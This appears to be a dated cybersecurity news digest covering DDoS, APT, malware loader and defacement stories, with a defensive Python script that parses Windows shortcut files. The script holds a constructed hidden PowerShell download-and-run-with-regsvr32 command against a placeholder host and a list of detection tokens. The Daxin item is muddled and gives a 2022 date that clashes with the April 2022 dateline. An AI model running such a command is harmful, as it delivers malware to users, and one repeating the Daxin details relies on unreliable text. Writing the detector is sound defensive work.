Friday, April 29, 2022 // (IG): BB // Weekly Sponsor: Unsafe Waters
Pro-Iran hackers target Israeli radio station's site on 'Quds Day'
FROM THE MEDIA: Pro-Iranian hackers targeted livestreams on the websites of Israeli radio stations on Thursday night, as Iran and its proxies marked Quds Day.
A video replacing the livestreams showed the word "hacked" and a number of Israeli logos as the sound of a siren played followed by a recording in Arabic and a video of the Temple Mount and a rocket being fired.
The sites targeted included 100FM, 102.5FM, 91FM, Radio Sol and Hidabroot. The livestreams on the first four websites were not working as of the time of writing, while the livestream on the Hidabroot channel was working.
The hacker group behind this attack seems to be "Hackers of Savior," the group that in May 2020 hacked the website of The Jerusalem Post and hundreds of other Israeli websites. In that attack, the group replaced the pages with an anti-Israel video and message in Hebrew and broken English: “The countdown of Israel destruction has begun since a long time ago [sic].”
READ THE STORY: JPOST
Cloudflare mitigated a 15M requests-per-second DDoS
FROM THE MEDIA: Cloudflare says that it successfully mitigated a huge 15.3 million requests-per-second DDoS attack.
The incident was the largest HTTPS attack that Cloudflare has seen. HTTPS attacks, Cloudflare notes, are “more expensive in terms of required computational resources because of the higher cost of establishing a secure TLS encrypted connection.”
Such attacks cost an attacker more to launch, and more for a victim to mitigate.
The target was a Cloudflare customer operating a crypto launchpad that surfaces decentralized finance projects to potential investors. Cloudflare says the attack used a botnet that it was already observing and lasted less than 15 seconds.
The majority of the attack traffic came from Indonesia, followed by Russia, Brazil, India, Colombia, and the US.
Cloudflare notes that the attack was interesting because it mostly came from data centres; the company is seeing a “big move” from residential network ISPs to cloud compute ISPs.
While this was the largest HTTPS attack that Cloudflare has seen, it’s not the largest overall.
READ THE STORY: Telecoms Tech News
Lapsus$ targeting SharePoint, VPNs and virtual machines
FROM THE MEDIA: A new report shed light on the techniques and tactics of the highly unpredictable Lapsus$ attacks.
NCC Group on Thursday released a report describing how Lapsus$ attacks are launched and what makes it such a unique group.
While Lapsus$ quieted down following the arrests of alleged members in March, the attacks launched by the group remain perplexing in both their motives and their methods. The group is most known for its attacks on companies like Microsoft, Nvidia, Okta and Samsung.
The NCC Group report showed how Lapsus$ used stolen authentication cookies, specifically ones used for SSO applications, to initially get into its victims' systems. The attackers also scraped Microsoft SharePoint sites used by target organizations, hoping to find credentials within technical documentation.
From that initial point of access, Lapsus$ rapidly climbed up organizations.
READ THE STORY: Tech Target
The super malicious insider and the rise of insider threats
FROM THE MEDIA: In 2021, the work-from-anywhere (WFA) movement took up permanent residence in enterprises across business and industry, spurred by pandemic precautions and an accelerated digital transition to cloud-based systems. The year also gave life to a new breed of cyber threat actor: the Super Malicious Insider.
The hasty shift to remote work created an array of new challenges for security and risk professionals who suddenly had to protect hundreds of thousands of “remote offices” outside of traditional, perimeter-based corporate controls. Combined with a measurable increase in employee attrition toward the end of 2021 (“The Great Resignation”), the transition created a perfect storm for insider threats.
With this in mind, we set out to examine the effect of remote work on employee human behavior that is driving a dramatic increase in damaging insider attacks. In addition to noticing a significant increase in anomalous behavior driven by WFA practices, such as odd working hours and the use of new applications, our research revealed sharp increases in industrial espionage, the theft of intellectual property (IP) and data, and other criminal acts. And it classifies, for the first time, the Super Malicious Insider, someone with the knowledge and skills (often provided by their employer) to avoid detection by accepted defensive practices. The following trends should serve as a wake-up call to security teams that traditional tools such as Data Loss Prevention (DLP), User Behavior Analytics (UBA) and User Activity Monitoring (UAM) are being avoided or circumvented by insiders.
READ THE STORY: Venturebeat
Attackers Breach ‘Dozens’ of GitHub Repos Using Stolen OAuth Tokens
FROM THE MEDIA: GitHub revealed details tied to last week’s incident where hackers, using stolen OAuth tokens, downloaded data from private repositories.
“We do not believe the attacker obtained these tokens via a compromise of GitHub or its systems because the tokens in question are not stored by GitHub in their original, usable formats,” said Mike Hanley, chief security officer, GitHub.
OAuth (Open Authorization) is an open standard authorization framework for token-based authorization on the internet. It allows an end user's account information to be used by third-party services, such as Facebook and Google.
OAuth does not share credentials; instead it uses an authorization token to prove identity and acts as an intermediary that approves one application's interaction with another.
Incidents of stolen or found OAuth tokens commandeered by adversaries are not uncommon.
Microsoft suffered an OAuth flaw in December 2021, where applications (Portfolios, O365 Secure Score, and Microsoft Trust Service) were vulnerable to authentication issues that enabled attackers to take over Azure accounts. To abuse it, the attacker first registers a malicious app with the OAuth provider, with the redirection URL pointing to a phishing site, and then sends the target a phishing email containing a URL for OAuth authorization.
READ THE STORY: Threatpost
Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group (Poss. APT10)
FROM THE MEDIA: A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities.
Calling TA410 an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog, and JollyFrog, Slovak cybersecurity firm ESET assessed that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure."
TA410 — said to share behavioral and tooling overlaps with APT10 (aka Stone Panda or TA429) — has a history of targeting U.S.-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa.
Other identified victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in Israel, in addition to unnamed victims in the education and military verticals.
READ THE STORY: The Hacker News
New Bumblebee Malware Loader in Active Development
FROM THE MEDIA: Starting in March, three threat groups were observed delivering a new, sophisticated malware loader that researchers said could represent “a notable shift in the cybercriminal threat landscape.”
The loader, which researchers with Proofpoint call Bumblebee (so-called due to the name of a unique User-Agent used in early campaigns), is in active development and includes several complex detection evasion techniques. The aim of the loader is to download and execute additional payloads, and researchers observed Bumblebee dropping Cobalt Strike, shellcode and Sliver in several different campaigns.
“Bumblebee is a sophisticated downloader containing anti-virtualization checks and a unique implementation of common downloader capabilities, despite it being so early in the malware's development,” said researchers with Proofpoint in a Thursday analysis. “The use of Bumblebee by multiple threat actors, the timing of its introduction in the landscape, and behaviors described in this report can be considered a notable shift in the cybercriminal threat landscape."
READ THE STORY: DUO
Cyberattacks Rage in Ukraine, Support Military Operations
FROM THE MEDIA: At least five APTs are believed to be involved in attacks tied to ground campaigns and designed to damage Ukraine’s digital infrastructure.
Cyberattacks against Ukraine have been used strategically to support ground campaigns, with five state-sponsored advanced persistent threat (APT) groups behind attacks that began in February. According to research published by Microsoft on Wednesday, the APTs involved in the campaigns are state-sponsored by Russia.
Separate reports published this week also shed new light on the wave of cyberattacks against Ukrainian digital assets by APTs with ties to Russia.
Microsoft researchers believe six separate Russia-aligned threat actors carried out 237 cyber operations that resulted in threats to civilian welfare and attempted to carry out dozens of cyberespionage attacks against Ukrainian targets.
READ THE STORY: Threatpost
China Spies on Russians; Microsoft Details Ukraine Attacks
FROM THE MEDIA: Researchers have observed China-based government-sponsored threat actors collecting intelligence by targeting Russian government officials with an updated variant of a remote access Trojan known as PlugX, a backdoor popular with Chinese-speaking hacker groups.
Cybersecurity firm Secureworks' Counter Threat Unit attributes the current intrusion attempts to the China-based Bronze President threat group because of its use of DLL search order hijacking to execute PlugX malware payloads. Bronze President is also known as Mustang Panda, TA416, HoneyMyte, RedDelta and PKPLUG.
Active since at least July 2018, Bronze President compromises and collects data from nongovernmental organizations and creates multiple contingent access routes for maintaining access to compromised systems for the long term.
The group also uses proprietary and publicly available tools, including Cobalt Strike, China Chopper, PlugX, RCSession and ORat; the last two are tied exclusively to the group.
READ THE STORY: Gov Info Security
Cyber agency director says election security a top priority ahead of midterms
FROM THE MEDIA: Jen Easterly, the head of the Cybersecurity & Infrastructure Security Agency (CISA), told lawmakers on Thursday that election security is a top priority for her agency, as it anticipates Russian interference in the upcoming midterm elections.
Easterly, who was testifying before the House Committee on Appropriations on the agency’s budget request, said midterm election security “is obviously one of our top priorities,” adding CISA was focused on guiding states and localities to combat disinformation campaigns — a tactic the Russians are expected to deploy.
“We are here to help and make sure that all state and local election directors have the resources that they need to ensure the integrity of their election security,” Easterly said.
READ THE STORY: The Hill
US and China Exposed Most Databases Among 308,000 Discovered in 2021
FROM THE MEDIA: In July 2020, researchers identified over 10,000 unsecured databases that exposed more than ten billion (10,463,315,645) records to public access without any security authentication. Now, the IT security researchers at Group-IB have revealed startling figures about the surge in exposed databases.
Cybersecurity firm Group-IB’s Attack Surface Management team confirmed identifying 308,000 exposed databases in 2021, and over 165,000 of them were identified in the second half of the year.
The Singapore-based firm’s researchers continually scan the IPv4 ecosystem to detect external-facing assets hosting vulnerable or exposed databases, phishing panels, malware, and JS-sniffers. The researchers found 399,200 exposed databases between Q1’21 and Q1’22 and 308,000 in 2021, marking a 16% increase from the second half of 2021.
READ THE STORY: Hackread
DHS disinformation board to tackle Russia, migrant smugglers
FROM THE MEDIA: The Department of Homeland Security is stepping up an effort to counter disinformation coming from Russia as well as misleading information that human smugglers circulate to target migrants hoping to travel to the U.S.-Mexico border.
“The spread of disinformation can affect border security, Americans’ safety during disasters, and public trust in our democratic institutions,” the department said in a statement Wednesday. It declined The Associated Press’ request for an interview.
A newly formed Disinformation Governance Board announced Wednesday will immediately begin focusing on misinformation aimed at migrants, a problem that has helped to fuel sudden surges at the U.S. southern border in recent years. Human smugglers often spread misinformation around border policies to drum up business.
READ THE STORY: The Hill
How the French fiber optic cable attacks accentuate critical infrastructure vulnerabilities
FROM THE MEDIA: The pictures show neatly trimmed fiber optic cables dug up from underground behind what appears to be a well-hidden grate. The apparent simplicity of the sabotage is all the more harrowing in light of how extensively it disrupted Internet service in France, experts said.
A day after what French telecom companies are calling a large-scale coordinated attack which destroyed a large number of fiber optic cables powering the French internet, authorities there are investigating the attacks as a criminal act.
The Wednesday incident disrupted Internet service throughout France, and those responsible seem to have known how to do as much damage as possible. The Associated Press reported that the French internal intelligence service has joined the investigation, a development which it called “unusual.”
READ THE STORY: Cyberscoop
Czech Television hit in another wave of cyber attacks
FROM THE MEDIA: More Czech websites have been hampered by another round of cyber attacks. The website of ČT24, the 24-hour channel of public broadcaster Czech Television, was inaccessible for several hours yesterday due to attacks, and Czech Radio's news server iRozhlas.cz was also out of operation, though the cause has not been confirmed. Russian hacker group Killnet, which was responsible for previous cyber attacks, said earlier this week that it would target Czech media.
ČT24 was taken offline by a distributed denial-of-service (DDoS) attack, in which perpetrators overload the targeted web server with so many requests that it can no longer respond to legitimate visitors.
READ THE STORY: Expats
The expanding threat landscape: Fortinet is building cyber resilience across industries
FROM THE MEDIA: Forty years ago, nobody envisioned that the internet – built to connect networks and devices – would become one of the most concerning landscapes of the 21st century.
In recent decades we have had significant cyber attacks in media, financial organizations, governments, oil and gas, and so on. These breaches coincide with a concerning rise in ransomware as part of the range of increasingly sophisticated attacks. These events became more prevalent as organizations started to expose their networks, data and processes to adapt to a new digital era. The same trends led Fortinet back in 2000 to identify the need for comprehensive security and to develop state-of-the-art solutions that provide broad, integrated and automated protection against security threats.
As the digital field evolved, organizations realized data allowed them to make better business decisions. Data-driven business decisions became mainstream, but the methods to secure them stayed the same until the old and outdated 1995 Data Protection Directive was replaced by the General Data Protection Regulation (GDPR) in 2018.
GDPR mandated that organizations must protect user data by default. While GDPR did not slow down the number of attacks – nor was that its purpose – it enacted a shift in how securing personal data was done, from being an afterthought to being required by law.
READ THE STORY: Newstatesman
Items of interest
Hackers have found a sneaky new way to infect Windows devices
FROM THE MEDIA: The operators of Emotet, one of the world’s most dangerous malware variants, have moved away from using Microsoft Office macros for distribution, and towards Windows shortcut files (.lnk).
As per a BleepingComputer report, cybersecurity researchers have observed Emotet using PowerShell commands attached to the .lnk file to download and run a malicious script on the target endpoint.
The script is said to be relatively well hidden, not showing in the file’s properties under “Target”.
The shortcut file carries URLs for “several” compromised websites that store the malicious PowerShell script. If a victim runs the shortcut file, and the website still hosts the malware, it will download it to the system’s Temp folder with a random name, and then run it using regsvr32.exe.
Cybersecurity researchers from ESET are claiming that Emotet’s new distribution method works best in Mexico, Italy, Japan, Turkey, and Canada.
Emotet was forced into abandoning macros after Microsoft made it impossible for users of Word, Excel, Access, PowerPoint, and Visio, to run any VBA macros in “untrusted” documents.
In an announcement made in early February this year, Microsoft said that all files shared from outside the company network would be deemed “untrusted”, meaning files coming from the same domain can still keep their macros.
READ THE STORY: Techradar
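A .lnk file stores its command line in the StringData section of the MS-SHLLINK structure, so a defender can read the PowerShell arguments described above directly rather than relying on what the Properties dialog displays. The following Python example is added here and is not from the BleepingComputer or ESET research; the sample shortcut, its placeholder URL and the indicator tokens are constructed for illustration.

```python
import struct

# MS-SHLLINK (Windows shell link) header constants
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Heuristic tokens (assumed indicators chosen for this example) matching the behaviour
# in the story: PowerShell, hidden window, download, %TEMP% staging, regsvr32 execution.
SUSPICIOUS = ("powershell", "-w hidden", "windowstyle hidden", "-enc", "downloadstring",
              "invoke-webrequest", "iwr ", "$env:temp", "%temp%", "regsvr32")


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file (name, target path, arguments...)."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data)[0] != LNK_HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]   # ShowCommand field
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # skip IDList: uint16 size + items
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                      # skip LinkInfo: uint32 size includes itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"show_command": show_cmd}
    for flag, name in STRING_FIELDS:               # each string: uint16 char count + chars
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + count * width]
            off += count * width
            info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return info


def assess_lnk(data: bytes) -> tuple[dict, list[str]]:
    """Parse a shortcut and list which suspicious tokens its full command line contains."""
    info = parse_lnk(data)
    cmdline = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    return info, [tok for tok in SUSPICIOUS if tok in cmdline]


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk (StringData only) as a test fixture."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed sample mimicking the reported shortcut: PowerShell fetches a file into
# %TEMP% under a random name and hands it to regsvr32. The URL is a placeholder.
SAMPLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r'-w hidden -c "Invoke-WebRequest http://compromised-site.example/x -OutFile '
    r'$env:TEMP\k7d2q.dll; regsvr32 $env:TEMP\k7d2q.dll"',
    show_command=7)  # SW_SHOWMINNOACTIVE: the console starts minimised

if __name__ == "__main__":
    info, hits = assess_lnk(SAMPLE_LNK)
    print(info["relative_path"], info["arguments"], hits, sep="\n")
```

Running the script against real shortcuts only requires reading the file bytes and passing them to assess_lnk; any non-empty hit list is a candidate for closer review.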
Qakbot Botnet Sprouts Fangs, Injects Malware into Email Threads (Video)
FROM THE MEDIA: Qakbot, also known as QuackBot, Pinkslipbot and QBot, is a well-known banking trojan first revealed in 2007 and considered highly prevalent ever since. Brandt suggests that security professionals should take the Qakbot threat seriously. The botnet has since become even more dangerous: it hijacks email threads to install malicious DLLs whose code can steal passwords from different websites. Sophos recently published a deep dive into the botnet, explaining how experts analyzed it spreading via email thread hijacking. Once the malware finds a target, it tries to gain access to important details and then downloads a minimum of three malicious modules. The trojan's code also uses unusual encryption to cover up the contents of its communications; however, Sophos experts decrypted the modules and decoded the botnet’s C2 system to reveal how Qakbot gets its marching orders.
Daxin Espionage Malware Attacks On Chinese Malware (Video)
FROM THE MEDIA: So this is where the technology is at: the espionage tool can reach computers even if they are not connected to the Internet, hopping from node to node. According to some researchers, the Daxin malware is targeting hardened government entities, and its goal is cyber espionage. The Symantec Threat Hunter team saw an advanced persistent threat (APT) weapon in action; in November 2022 they noted that it is the most advanced malware Symantec researchers have ever seen. They also stated that Daxin's operations include starting and interacting with arbitrary processes, reading and writing arbitrary files, and advanced lateral movement and stealth capabilities. The U.S. CISA (Cybersecurity and Infrastructure Security Agency) noticed the activity and flagged it. The oldest known sample of the malware dates from 2013, and at that time it already had a huge, fully developed codebase.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com